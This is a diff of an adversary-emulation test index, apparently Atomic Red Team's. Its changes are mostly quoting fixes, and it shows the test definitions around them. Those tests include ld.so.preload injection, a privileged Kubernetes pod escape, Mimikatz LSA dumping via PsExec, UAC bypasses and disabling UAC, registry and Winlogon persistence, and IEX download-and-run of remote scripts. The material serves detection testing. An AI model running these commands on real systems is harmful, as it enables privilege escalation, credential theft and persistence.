@@ -13856,21 +13856,21 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' -' + ' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload -' + ' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -13895,18 +13895,18 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls -' + ' name: bash T1055.001: technique: @@ -14006,10 +14006,10 @@ privilege-escalation: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" @@ -14155,7 +14155,7 @@ privilege-escalation: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 -' + ' supported_platforms: - macos input_arguments: 
@@ -14253,24 +14253,24 @@ privilege-escalation: - description: Verify docker is installed. prereq_command: 'which docker -' + ' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi -' + ' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker -' + ' get_prereq_command: 'sudo systemctl start docker -' + ' - description: Verify kind is in the path. prereq_command: 'which kind -' + ' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -14278,14 +14278,14 @@ privilege-escalation: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters -' + ' get_prereq_command: 'sudo kind create cluster --name atomic-cluster -' + ' - description: Verify kubectl is in path prereq_command: 'which kubectl -' + ' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl @@ -14296,11 +14296,11 @@ privilege-escalation: true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'' -' + ' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod -' + ' T1546: technique: id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db @@ -14844,7 +14844,7 @@ privilege-escalation: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: 
@@ -14860,19 +14860,19 @@ privilege-escalation: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" -' + ' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -15008,7 +15008,7 @@ privilege-escalation: description: 'This test uses the insmod command to load a kernel module for Linux. -' + ' supported_platforms: - linux input_arguments: @@ -15032,10 +15032,10 @@ privilege-escalation: dependencies: - description: 'The kernel module must exist on disk at specified location -' + ' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -15044,7 +15044,7 @@ privilege-escalation: executor: command: 'sudo insmod #{module_path} -' + ' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -15250,7 +15250,7 @@ privilege-escalation: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it -' + ' supported_platforms: - macos input_arguments: @@ -15267,15 +15267,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; -' + ' executor: name: bash elevation_required: true 
@@ -15369,7 +15369,7 @@ privilege-escalation: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` -' + ' supported_platforms: - macos input_arguments: @@ -15386,15 +15386,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; -' + ' executor: name: bash elevation_required: true @@ -15614,7 +15614,7 @@ privilege-escalation: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script -' + ' supported_platforms: - macos executor: @@ -15812,7 +15812,7 @@ privilege-escalation: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files -' + ' supported_platforms: - windows input_arguments: @@ -15823,7 +15823,7 @@ privilege-escalation: executor: command: 'netsh.exe add helper #{helper_file} -' + ' name: command_prompt T1037.003: technique: @@ -15985,10 +15985,10 @@ privilege-escalation: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) -' + ' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" @@ -16029,7 +16029,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' 
@@ -16058,7 +16058,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' @@ -16088,7 +16088,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -16124,7 +16124,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -16534,7 +16534,7 @@ privilege-escalation: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories -' + ' supported_platforms: - macos executor: @@ -16635,11 +16635,11 @@ privilege-escalation: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ -' + ' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1055.002: @@ -16787,7 +16787,7 @@ privilege-escalation: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: @@ -16803,13 +16803,13 @@ privilege-escalation: dependencies: - description: 'Ensure a powershell profile exists for the current user -' + ' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force -' + ' executor: command: | Add-Content #{ps_profile} -Value "" 
@@ -17156,13 +17156,13 @@ privilege-escalation: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore -' + ' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process -' + ' supported_platforms: - windows input_arguments: @@ -17174,7 +17174,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -17185,7 +17185,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -17308,7 +17308,7 @@ privilege-escalation: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -17319,7 +17319,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -17354,7 +17354,7 @@ privilege-escalation: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} 
@@ -17369,10 +17369,10 @@ privilege-escalation: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -17383,7 +17383,7 @@ privilege-escalation: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" -' + ' name: command_prompt elevation_required: false T1055.008: @@ -17560,14 +17560,14 @@ privilege-escalation: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common -' + ' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common -' + ' supported_platforms: - linux executor: @@ -17583,12 +17583,12 @@ privilege-escalation: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi -' + ' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local -' + ' supported_platforms: - linux executor: @@ -17604,7 +17604,7 @@ privilege-escalation: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi -' + ' T1547.007: technique: created: '2020-01-24T18:15:06.641Z' @@ -17686,10 +17686,10 @@ privilege-escalation: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} -' + ' cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook -' + ' elevation_required: true name: sh T1547.001: 
@@ -17815,11 +17815,11 @@ privilege-escalation: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" -' + ' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 -' + ' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -17837,11 +17837,11 @@ privilege-escalation: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" -' + ' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce @@ -17867,7 +17867,7 @@ privilege-escalation: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -18108,7 +18108,7 @@ privilege-escalation: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. -' + ' supported_platforms: - windows input_arguments: @@ -18125,10 +18125,10 @@ privilege-escalation: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 -' + ' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -18164,11 +18164,11 @@ privilege-escalation: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 -' + ' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | 
@@ -18190,7 +18190,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 -' + ' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -18207,7 +18207,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -18218,7 +18218,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -18231,7 +18231,7 @@ privilege-escalation: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. -' + ' supported_platforms: - windows executor: @@ -18243,7 +18243,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 -' + ' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -18379,7 +18379,7 @@ privilege-escalation: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. -' + ' supported_platforms: - windows input_arguments: @@ -18636,7 +18636,7 @@ privilege-escalation: description: 'Change Service registry ImagePath of a bengin service to a malicious file -' + ' supported_platforms: - windows input_arguments: 
@@ -18656,22 +18656,22 @@ privilege-escalation: dependencies: - description: 'The service must exist (#{weak_service_name}) -' + ' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" -' + ' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" -' + ' cleanup_command: 'sc.exe delete #{weak_service_name} -' + ' name: command_prompt T1548.001: technique: @@ -18727,7 +18727,7 @@ privilege-escalation: description: 'Make, change owner, and change file attributes on a C source code file -' + ' supported_platforms: - macos - linux @@ -18753,7 +18753,7 @@ privilege-escalation: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -18769,14 +18769,14 @@ privilege-escalation: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -18792,7 +18792,7 @@ privilege-escalation: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true - name: Make and modify capabilities of a binary @@ -18824,7 +18824,7 @@ privilege-escalation: description: 'This test gives a file the capability to set UID without using flags. -' + ' supported_platforms: - linux input_arguments: @@ -18838,7 +18838,7 @@ privilege-escalation: sudo setcap cap_setuid=ep #{file_to_setcap} cleanup_command: 'rm #{file_to_setcap} -' + ' name: sh elevation_required: true T1547.009: 
@@ -18912,7 +18912,7 @@ privilege-escalation: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 -' + ' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 @@ -19013,10 +19013,10 @@ privilege-escalation: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist -' + ' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist -' + ' name: sh elevation_required: true T1548.003: @@ -19084,7 +19084,7 @@ privilege-escalation: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. -' + ' supported_platforms: - macos - linux @@ -19098,7 +19098,7 @@ privilege-escalation: This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -19113,7 +19113,7 @@ privilege-escalation: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -19219,7 +19219,7 @@ privilege-escalation: description: 'This test creates a Systemd service unit file and enables it as a service. -' + ' supported_platforms: - linux input_arguments: @@ -19292,15 +19292,15 @@ privilege-escalation: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. -' + ' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. -' + ' executor: name: bash elevation_required: true 
@@ -19452,20 +19452,20 @@ privilege-escalation: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -19482,20 +19482,20 @@ privilege-escalation: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -19967,7 +19967,7 @@ privilege-escalation: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user -' + ' supported_platforms: - macos - linux @@ -19979,13 +19979,13 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile -' + ' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user -' + ' supported_platforms: - macos - linux @@ -19997,7 +19997,7 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc -' + ' name: sh T1055.014: technique: 
@@ -20432,10 +20432,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -20468,10 +20468,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -20567,11 +20567,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -20590,11 +20590,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 
@@ -20616,7 +20616,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore -' + ' name: powershell T1547.013: technique: @@ -21110,10 +21110,10 @@ defense-evasion: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} -' + ' cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -21137,10 +21137,10 @@ defense-evasion: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} -' + ' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore -' + ' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -21178,7 +21178,7 @@ defense-evasion: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 @@ -21210,10 +21210,10 @@ defense-evasion: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr -' + ' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1 -' + ' name: command_prompt T1027.001: technique: @@ -21303,20 +21303,20 @@ defense-evasion: dependencies: - description: 'The binary must exist on disk at specified location (#{file_to_pad}) -' + ' prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'cp /bin/ls #{file_to_pad} -' + ' executor: command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} -' + ' cleanup_command: 'rm #{file_to_pad} -' + ' name: sh T1542.003: technique: 
@@ -21549,7 +21549,7 @@ defense-evasion: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -21571,7 +21571,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -21593,7 +21593,7 @@ defense-evasion: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -21616,7 +21616,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f @@ -21639,7 +21639,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -21687,7 +21687,7 @@ defense-evasion: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore -' + ' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -21700,11 +21700,11 @@ defense-evasion: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f -' + ' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f -' + ' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task 
@@ -21751,7 +21751,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21762,7 +21762,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21787,7 +21787,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21798,7 +21798,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21822,7 +21822,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21833,7 +21833,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21858,7 +21858,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21869,7 +21869,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore 
@@ -21893,7 +21893,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21904,7 +21904,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21928,7 +21928,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21939,7 +21939,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21964,7 +21964,7 @@ 